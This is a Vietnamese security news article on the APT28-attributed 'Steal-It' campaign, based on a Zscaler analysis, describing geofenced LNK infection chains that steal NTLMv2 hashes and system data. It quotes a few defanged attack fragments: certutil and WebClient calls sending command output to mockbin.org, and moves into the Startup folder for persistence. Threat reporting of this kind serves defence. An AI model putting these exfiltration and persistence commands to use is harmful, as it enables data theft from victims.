Thông qua phân tích chuyên sâu về payload độc hại, các nhà nghiên cứu quan sát thấy chiến dịch tập trung nhắm mục tiêu vào Úc, Ba Lan và Bỉ. Các nhà nghiên cứu tin rằng đứng sau chiến dịch Steal-It là nhóm tin tặc APT28 (còn gọi là Fancy Bear) dựa trên những điểm tương đồng của nó với cuộc tấn công mạng APT28 được Trung tâm Ứng cứu khẩn cấp máy tính Ukraine (CERT-UA) báo cáo vào tháng 4/2023.
Đánh cắp hàm băm NTLMV2
Hình 1. Luồng lây nhiễm đánh cắp hàm băm NTLMv2
Chuỗi lây nhiễm này được thực hiện bằng cách sử dụng phiên bản tùy chỉnh của tập lệnh PowerShell Start-CaptureServer của Nishang và truyền các hàm băm bị đánh cắp thông qua API mô phỏng tới Mockbin.
Hành vi này bắt đầu bằng một kho lưu trữ ZIP đi kèm với tệp LNK (shortcut) độc hại, tệp LNK được ủy quyền tải xuống và thực thi một tập lệnh PowerShell khác từ trang web “mockbin[.]org” và “webhook[.]site” như Hình 2.
Hình 2. Tải xuống tệp LNK ban đầu và thực thi tập lệnh PowerShell Start-CaptureServer tùy chỉnh của Nishang
Tập lệnh PowerShell được thực thi bởi tệp LNK độc hại là phiên bản tùy chỉnh của tập lệnh Start-CaptureServer.ps1 của Nishang, được phát triển đặc biệt để thu thập các giá trị hàm băm NTLMv2.
Các tác nhân đe dọa đã sửa đổi Start-CaptureServer.ps1 bằng cách xóa ghi chú (comment) để tránh phát hiện tĩnh và phương pháp xác thực cơ bản để lấy thông tin xác thực.
Sửa đổi quan trọng nhất mà các nhà nghiên cứu quan sát thấy là các giá trị băm NTLMv2 được mã hóa base64 đã thu thập được lọc ra bằng cách gọi hàm “Net.WebClient.DownloadString()” với URL “https[:]//mockbin.org/bin/<id>”.
Hình 3. Phiên bản tùy chỉnh của tập lệnh PowerShell Start-CaptureServer của Nishang
Khi hàm “DownloadString()” được thực thi, nó sẽ thực hiện yêu cầu GET tới URL mockbin[.]org được chỉ định.
Mockbin cho phép tạo các điểm cuối tùy chỉnh để kiểm tra, mô phỏng và giám sát các yêu cầu cũng như phản hồi HTTP trên các thư viện, socket và API khác nhau. Khi yêu cầu GET được gửi tới URL Mockbin bằng hàm băm NTMLv2 được mã hóa base64 đã thu thập, yêu cầu đó sẽ được ghi lại ở phía máy chủ và có thể bị theo dõi bởi các tác nhân đe dọa.
Đánh cắp thông tin hệ thống
Hình 4. Luồng lây nhiễm đánh cắp thông tin hệ thống
Hành vi đánh cắp thông tin hệ thống (systeminfo) sử dụng mạng xã hội OnlyFans để lôi kéo người dùng tải xuống các giai đoạn sau của chuỗi, sau đó lọc các đầu ra lệnh tới Mockbin. Chuỗi lây nhiễm bắt đầu bằng một kho lưu trữ ZIP có tên “best_tits.zip” đi kèm với tệp LNK độc hại có tên “onlyfans.com-1.lnk”.
Sau khi thực thi, tệp LNK độc hại sẽ chạy lệnh mở trình duyệt Microsoft Edge với đối số được mã hóa base64. Đối số này là JavaScript one-liner để chuyển hướng đến URL “http://run[.]mocky[.]io/v3/<id>” bằng cách sử dụng “location.href”.
Hình 5. Tệp LNK ban đầu
Để che giấu hành vi chuyển hướng độc hại, lệnh này cũng mở trang web OnlyFans hợp pháp trong một tab khác và tạm dừng thực thi trong 9 giây. Lúc này URL run[.]mocky[.]io đã mở là một trang HTML có mã JavaScript độc hại thực hiện các hành động sau:
Cụ thể, việc tìm kiếm mã quốc gia “AU” cho thấy chuỗi lây nhiễm được khoanh vùng địa lý và nhắm mục tiêu vào người dùng từ Úc.
Nếu hệ điều hành của người dùng là Windows và họ đến từ Úc, mã sẽ tiến hành tải xuống một tệp LNK độc hại khác có tên “m8”. Tệp này được tạo ra bằng cách giải mã một khối dữ liệu được mã hóa base64.
Hình 6. Trang HTML Run[.]Mocky[.]io được khoanh vùng địa lý cho người dùng mục tiêu từ Úc
Hơn nữa, tệp LNK đã tải xuống sẽ được sao chép vào thư mục Startup như được chỉ định trong đối số của tệp LNK trước đó: “move /y %userprofile%\Downloads\m8 m8.lnk”. Do thư mục làm việc của tệp LNK trước đó được đặt thành đường dẫn thư mục Startup nên tệp LNK sẽ được sao chép vào thư mục Startup. Do đó, tệp “m8.lnk” sẽ được thực thi mỗi khi hệ thống được khởi động lại, cho phép hệ thống tồn tại lâu dài.
Khi được thực thi, tệp LNK đã tải xuống m8.lnk sẽ tải xuống tệp CMD từ run[.]mocky[.]io và sao chép nó vào thư mục Startup dưới dạng “m8.cmd”, theo phương pháp tương tự như tệp LNK trước đó. Tệp CMD m8.cmd được thực thi khi khởi động lại hệ thống và là tập lệnh cuối cùng được ủy quyền để thu thập và lọc thông tin hệ thống. Sau khi được thực thi, trước tiên nó sẽ chạy ba lệnh hệ thống sau: “ipconfig, “systeminfo”, “tasklist” và lưu kết quả đầu ra vào thư mục ProgramData. Từ đây, tập lệnh base64 mã hóa các tệp đầu ra lệnh bằng “CertUtil” và đặt các biến môi trường cho đầu ra lệnh được mã hóa base64 bằng cách sử dụng “set /p ipc=<%programdata%\<b64enc_cmdoutput>”. Các biến môi trường mới đặt sẽ được lọc bằng cách thực hiện yêu cầu GET tới mockbin[.]org bằng cách sử dụng “certutil -urlcache -f <http[:]//mockbin[.]org/bin/<id>/%env_var%”.
Hình 7. Thực thi các lệnh hệ thống và trích xuất đầu ra sang Mockbin.org
Ở cuối tập lệnh, quá trình dọn dẹp diễn ra, trong đó các tệp đầu ra lệnh bị xóa và đầu ra lệnh của các lệnh đã thực thi: ipconfig, systeminfo, tasklist được lọc sang URL Mockbin.
Chuỗi lây nhiễm Whoami Exfil
Hình 8. Luồng chuỗi lây nhiễm WHOAMI EXFIL
Chuỗi lây nhiễm Whoami Exfil sử dụng mạng xã hội Fansly để lôi kéo người dùng tải xuống các giai đoạn sau của chuỗi, chuỗi này sẽ lọc các đầu ra lệnh tới Mockbin.
Luồng hoạt động này bắt đầu bằng một kho lưu trữ ZIP đi kèm với tệp LNK độc hại. Tệp LNK mở URL “http://run[.]mocky[.]io/v3/<id>” trong trình duyệt, bao gồm một trang HTML có Javascript độc hại. Trong trường hợp này, JavaScript thực hiện các hành động sau:
Cụ thể, việc tìm kiếm mã quốc gia “PL” cho thấy chuỗi lây nhiễm được khoanh vùng địa lý và nhắm mục tiêu vào người dùng từ Ba Lan.
Nếu tất cả các điều kiện trên đều được thỏa mãn, JavaScript sẽ tải xuống tệp ZIP có tên “fansly.zip”. Tệp ZIP bao gồm ba hình ảnh JPEG để lôi kéo người dùng tải xuống một tệp bactch độc hại, được gọi là “fansly.com_online.bat”.
Sau khi được thực thi, tập lệnh fansly.com_online.cmd sẽ thực hiện các hành động sau:
Khi URL mockbin[.]org được mở bằng tập lệnh batch trong trình duyệt Microsoft Edge, JavaScript sẽ thực hiện các hành động sau:
Nếu tất cả các điều kiện trên đều được thỏa mãn, JavaScript sẽ chuyển hướng đến một URL mockbin[.]org khác để thực thi một mã JavaScript khác nhằm thực hiện các hành động sau:
Nếu tất cả các điều kiện trên được đáp ứng, tệp eucv8o.css sẽ được tải xuống bằng cách giải mã blob base64 trong thư mục Download . Như đã đề cập ở trên, eucv8o.css được chuyển vào thư mục ProgramData dưới dạng eucv8o.cmd và sau đó được thực thi: chấm dứt tiến trình “msedge.exe”, thực thi lệnh “Whoami” và lưu kết quả đầu ra vào thư mục ProgramData, đặt biến môi trường “dobpyk” thành đầu ra của lệnh Whoami, lọc đầu ra của lệnh này tới URL mockbin[.]org bằng cách gửi yêu cầu GET với đầu ra lệnh như sau: “mockbin[.]org/bin/<id>/<cmd_output>”, xóa tệp đầu ra lệnh và tệp .css đã tải xuống.
Hình 9. Thực thi Whoami và trích xuất kết quả ra Mockbin.org
Chuỗi lây nhiễm Exfil của Windows Update
Hình 10. Luồng chuỗi lây nhiễm Exfil của Windows Update
Trong phân tích về chuỗi lây nhiễm này, các nhà nghiên cứu đã quan sát thấy một kho lưu trữ ZIP đi kèm tệp LNK sử dụng kỹ thuật khoanh vùng địa lý để nhắm mục tiêu vào người dùng ở Bỉ và vô tình tải xuống nhiều giai đoạn của tập lệnh PowerShell thực thi các lệnh hệ thống để thu thập thông tin cơ bản cho các mục đích xấu.
Đối với chuỗi lây nhiễm này, vectơ ban đầu là tệp LNK độc hại được đóng gói bên trong kho lưu trữ ZIP (ví dụ: “command_powershell.zip”). Tệp LNK độc hại mở URL “run[.]mocky[.]io” bằng Microsoft Edge. Thao tác này sẽ tải tệp “c1” xuống thư mục Download , sau đó tệp này được chuyển vào thư mục Startup dưới dạng “c1.bat”. Bất cứ khi nào hệ thống được khởi động lại, c1.bat sẽ được thực thi.
Tệp c1.bat bao gồm tiêu đề “Window Update” (giống hệt với chủ đề email lừa đảo) và có nhiệm vụ tải xuống một tập lệnh khác từ run[.]mocky[.]io vào thư mục ProgramData bằng cách sử dụng CertUtil.
Để che giấu hoạt động độc hại, tập lệnh batch hiển thị một thông báo dường như vô hại trên bảng điều khiển kèm theo thanh tiến trình. Tin nhắn có nội dung: “Dynamic Update for Windows Systems (KB5021043)”.
Hình 11. Thực thi tập lệnh batch Windows Update giả mạo
Tệp LNK mở URL run[.]mocky[.]io bằng Microsoft Edge, sau đó thực hiện các hành động sau:
Cụ thể, việc tìm kiếm mã quốc gia “BE” cho thấy chuỗi lây nhiễm được khoanh vùng địa lý và nhắm mục tiêu vào người dùng từ Bỉ (Hình 12).
Hình 12. HTML được khoanh vùng địa lý nhắm mục tiêu đến người dùng từ Bỉ
Nếu cả hai điều kiện trên đều được thỏa mãn, tập lệnh “b4.css” sẽ được tải xuống thư mục Download bằng cách giải mã blob base64. Tập lệnh sau đó được chuyển vào thư mục Startup và đổi tên thành “b4.cmd”. Điều này giúp các tác nhân đe dọa duy trì sự tồn tại lâu dài như trong các chuỗi lây nhiễm khác. Sau khi thực thi, b4.cmd sẽ mở một URL run[.]mocky[.]io khác bằng Microsoft Edge. Mã JavaScript thực thi tập lệnh batch với tiêu đề “Updating Windows” và hiển thị thông báo: “Dynamic Update for Windows Systems (KB5021043)” Từ đây, một tập lệnh khác được tải xuống từ run[.]mocky[.]io trong thư mục ProgramData bằng cách sử dụng CertUtil để thực thi tập lệnh đó. Trong quá trình phân tích, URL Mocky không thể truy cập được, do đó, khi tìm kiếm các tập lệnh tương tự có thông báo “Window Update” như Hình 11, các nhà nghiên cứu đã phát hiện ra một tập lệnh PowerShell thực thi tập lệnh cuối cùng được tải xuống từ run[.]mocky [.]io. Tập lệnh này cũng sử dụng tiêu đề là “Updating Windows” và thông báo “ynamic Cumulative Update for Windows (KB5023696)” để che giấu ý định độc hại. Tập lệnh PowerShell cuối cùng trong tập lệnh này được ủy quyền để thực thi các lệnh tasklist và systeminfo trên hệ thống, sau đó sử dụng “WebClient.UploadString()” để lọc đầu ra lệnh tới URL mockbin[.]org bằng cách sử dụng yêu cầu POST.
Ngoài thông tin hệ thống, các nhà nghiên cứu cũng quan sát thấy các trường hợp đường dẫn tệp đầy đủ được lọc sang mockbin[.]org bằng cách thực thi lệnh “Get-ChildItem -Path <path> -Recurse -File | select FullName” và sau đó lọc đầu ra lệnh bằng cách sử dụng hàm WebClient.UploadString().
KẾT LUẬN
Phân tích của Zscaler ThreatLabz về chiến dịch Steal-It cho thấy chiến lược định vị địa lý được nhắm mục tiêu và các chiến thuật tinh vi của các tác nhân đe dọa. Sự tỉ mỉ và quy trình kỹ thuật được thể hiện trong chiến dịch Steal-It nhấn mạnh tầm quan trọng của các biện pháp an ninh mạng mạnh mẽ hiện nay.
Hồng Đạt
13:00 | 13/11/2023
13:00 | 20/09/2023
10:00 | 31/01/2024
10:00 | 28/08/2023
17:00 | 08/11/2023
09:00 | 08/12/2023
07:00 | 11/12/2023
12:00 | 14/08/2023
14:00 | 09/11/2023
09:00 | 08/10/2024
Một lỗ hổng bảo mật nghiêm trọng trong Microchip Advanced Software Framework (ASF) mới được phát hiện gần đây, nếu khai thác thành công có thể dẫn đến việc thực thi mã từ xa.
13:00 | 07/10/2024
Các nhà nghiên cứu cho biết một lỗ hổng bảo mật khiến hàng triệu chiếc xe Kia sản xuất từ năm 2023 có thể bị chiếm quyền điều khiển, cho phép kẻ tấn công kiểm soát từ xa.
10:00 | 02/10/2024
Công ty Ivanti (Hoa Kỳ) tiết lộ một lỗ hổng bảo mật mới được vá trong Thiết bị dịch vụ đám mây (Cloud Service Appliance - CSA) của công ty đã bị tin tặc khai thác tích cực trong thực tế.
07:00 | 23/09/2024
Theo hãng bảo mật Doctor Web (Nga), tin tặc đã sử dụng mã độc Android.Vo1d để cài đặt backdoor trên các TV box, cho phép chúng chiếm quyền kiểm soát thiết bị hoàn toàn, sau đó tải và thực thi các ứng dụng độc hại khác. Được biết, các TV box này chạy hệ điều hành Android đã lỗi thời.
Một chuỗi các lỗ hổng bảo mật mới đã được phát hiện trong hệ thống in CUPS (Common Unix Printing System) Linux, có thể cho phép các tin tặc thực hiện chèn lệnh từ xa trong một số điều kiện nhất định.
09:00 | 11/10/2024